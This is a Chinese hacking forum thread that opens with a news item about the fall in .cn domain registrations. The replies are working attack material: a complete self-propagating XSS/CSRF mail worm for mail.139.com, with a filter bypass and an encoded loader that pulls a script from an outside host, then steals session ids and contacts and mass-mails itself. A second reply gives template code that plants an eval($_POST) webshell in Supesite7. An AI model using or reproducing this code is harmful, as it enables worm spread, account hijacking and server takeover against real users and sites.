返回列表 发帖

工信部整顿域名近一年 CN域名数量缩水五成

【文章摘要】自工信部去年年底全面实施实名域名注册,并对已注册域名进行逐一审核之后,CN域名数量不断减少。我国CN域名数量“缩水”近五成,域名数量已经从1368万下降至600多万。
【eNet资讯中心消息】据悉,中国互联网络中心(CNNIC)为了推广CN域名,于2007推出了“CN域名1元体验活动”, CN域名注册量在当年即超过了COM,并在2008年2月底突破1000万大关。而自去年底工信部对注册域名全面清查以来,我国CN域名数量“缩水”近五成,域名数量已经从1368万下降至600多万。
作为中国最大域名注册商之一的万网,其CEO张向东分析称,CN域名保有量大幅下滑的主要原因是国家有关部门加强了管理,其次则是取消了“1元”域名。张向东表示,工信部的此次整改对公司收入影响很大,但是却有效挤出了CN域名中的“水分”。
从中国互联网络中心去年公布的数据显示,当时CN域名注册数已经达到1368万个,这也是自07年推广CN域名以来,CN域名注册数达到的最高值。但是自工信部去年年底全面实施实名域名注册,并对已注册域名进行逐一审核之后,CN域名数量不断减少。

 

您可能还想看的主题:

百度域名遭劫持案尘埃落定 域名商赔偿并道歉

各国域名的后缀解析!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

邮箱蠕虫编写之139实例剖析
原理分析:      我们经常会用到的mail.139.com,由于对邮件正文过滤不严,导致存在xss漏洞。他们尽管实现了对style="xss:expression"进行过滤,但是可以通过添加/*  */绕过,如:。在添加/* */后,该脚本能够在IE浏览器执行。 同时,经过分析发现,mail.139.com中发送邮件的功能存在CSRF弱点;可以通过Ajax技术获取发送邮件所需要的mid值。另外邮箱的“通信录“中的联系人邮件可以直接通过javascript取出。 满足了编写csrf worm的3个条件,接下来的工作,就是通过编写javascript代码来实现了。 跨站代码: 该部分要实现的功能就是,触发浏览器去读取远端的js脚本,并且执行该脚本: Original: var ig =document.createElement("script");ig.src="http://www.sitedir.com.cn/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);} 对该部分编码按照10进制进行编码,以避免关键字被替换,并调用: <IMG STYLE="xss:expr/*xss*/ession(eval(String.fromCharCode(118, 97, 114, 32, 105, 103, 32, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 105, 103, 46, 115, 114, 99, 61, 34, 32, 104, 116, 116, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 57, 46, 49, 48, 52, 47, 119, 111, 121, 105, 103, 117, 105, 47, 49, 51, 57, 46, 106, 115, 34, 59, 116, 114, 121, 32, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 98, 111, 100, 121, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 105, 103, 41, 59, 125, 32, 99, 97, 116, 99, 104, 32, 40, 101, 41, 32, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 99, 117, 109, 101, 110, 116, 69, 108, 101, 109, 101, 110, 116, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 98, 111, 100, 121, 34, 41, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 98, 111, 100, 121, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 105, 103, 41, 59, 125)))"> 该部分代码,需放置在邮件正文中传送。 脚本功能的实现: 主要实现了如下功能: 1.通过脚本,读取联系人的邮箱地址。   该部分信息,可以通过top.LinkManList.concat()获取。 2.通过脚本,获取sid值   该部分信息,可以通过window.top.location.href,配合正则表达式获取到。 3.获取发送邮件所需要的mid值   在获取到sid值后,通过script打开"写邮件"页面,读取mid值。 4.发送邮件   发送邮件功能只验证mid值,因此在获取到正确的mid值后,连同获取到的联系人一起,构造post数据,发送邮件。 5.改写邮件转发规则和自动回复规则   在有正确的sid后,构造post。 完整代码: var xssed = false; if (typeof XSSflag != "undefined"){   xssed = true; } var XSSflag = [   {name: "version", url: "1.0"}, ]; if ( xssed != true ) {     var xmlhttp;   //create XHR   function createXMLHttp(){         try {         xmlhttp = new XMLHttpRequest();       } catch (e) {          var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',                      'MSXML2.XMLHTTP.4.0',                      'MSXML2.XMLHTTP.3.0',                      'MSXML2.XMLHTTP',                      'Microsoft.XMLHTTP' );         var success = false;         for (var i=0;i < XMLHTTP_IDS.length &amp;&amp; !success; i++) {           try {              xmlhttp = new ActiveXObject(XMLHTTP_IDS);               success = true;           } catch (e) {}         }         if (!success) {           throw new Error('Unable to create XMLHttpRequest.');         }      }   }   function domid (dourl) {     createXMLHttp();       var tmp = "";     xmlhttp.open("GET", dourl, false);       xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");     xmlhttp.setRequestHeader("Connection", "close");     xmlhttp.send(null);     setTimeout( tmp = xmlhttp.responseText,500);     return tmp;       }   function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){       createXMLHttp();       var params = "funcid=compose&amp;sid="+ sid +"&amp;mid="+ mid +"&amp;hidRemoteIp=&amp;ishtml=y&amp;optype=send.x&amp;idOpType=&amp;text="+ Content +"&amp;destcgi=&amp;funcid=compose&amp;netfdrhost=&amp;to="+ tomail +"&amp;cc=&amp;bcc=&amp;subject="+ subject +"&amp;year=&amp;month=&amp;day=&amp;hour=undefined&amp;compinfo_minute=&amp;chkHtmlMessage_text=y&amp;chkHtmlMessage=y&amp;ifsavetosent=y&amp;account="+ account +"&amp;destcgi=&amp;netfdrhost=&amp;split_rcpt=n&amp;return_receipt=0&amp;priority=0";     xmlhttp.open("POST", doUrl, false);       xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");     xmlhttp.setRequestHeader("Content-length", params.length);     xmlhttp.setRequestHeader("Connection", "close");     xmlhttp.send(params);   }   function doMyAjax()     {        var strPer = '/coremail/cgi/attachfapps';      var tomail = '<woyigui_test@139.com>;';      var subject = "test20";      var Content = "<img style="a:expr/**/ession(eval(String.fromCharCode(9,118,97,114,32,105,103,32,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,13,10,9,105,103,46,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,57,46,49,48,52,47,119,111,121,105,103,117,105,47,49,51,57,46,106,115,34,59,13,10,9,116,114,121,32,123,13,10,9,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,105,103,41,59,13,10,9,125,32,99,97,116,99,104,32,40,101,41,32,123,13,10,9,9,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,98,111,100,121,34,41,41,59,13,10,9,9,9,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,105,103,41,59,13,10,9,125)))">";      var account = "";      var sid = window.top.location.href.replace(/.*&amp;sid=(.*)/,"$1");      var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&amp;sid=" + sid );        var mid="",text="";      text=tmpmid.split("
");     for (var i=0;i < text.length; i++)     {       var patt=/name="mid" value="/;       if ( patt.test(text))       {           mid=text.replace(/.*name="mid" value="(.*)".*/, "$1");         break;       }     }     var mail_address=top.LinkManList.concat();     for (var i=0,len=mail_address.length;i<len;i++)     {  var mail=mail_address;       var reg_139=/@139.com/;       if ( reg_139.test(mail.addr)){         tomail += "<"+mail.addr+">;";       }     }      try {        startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), encodeURIComponent(Content), encodeURIComponent(account), mid, sid );          } catch (e) {        alert("send data error!");      }   }   doMyAjax(); }


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Supesite7后台获取shell方法
登陆后台,进入模板编辑植入以下PHP代码:
PHP代码<!--{eval $content = "@eval($_POST[c])";}-->   <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->   <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->   编辑模板的时候写入这几行,拆开写一句话,就行了.
本地使用PHP链接被写入的一句话木马页面,上传大马!


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

我刚来~~~嘿嘿~~


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表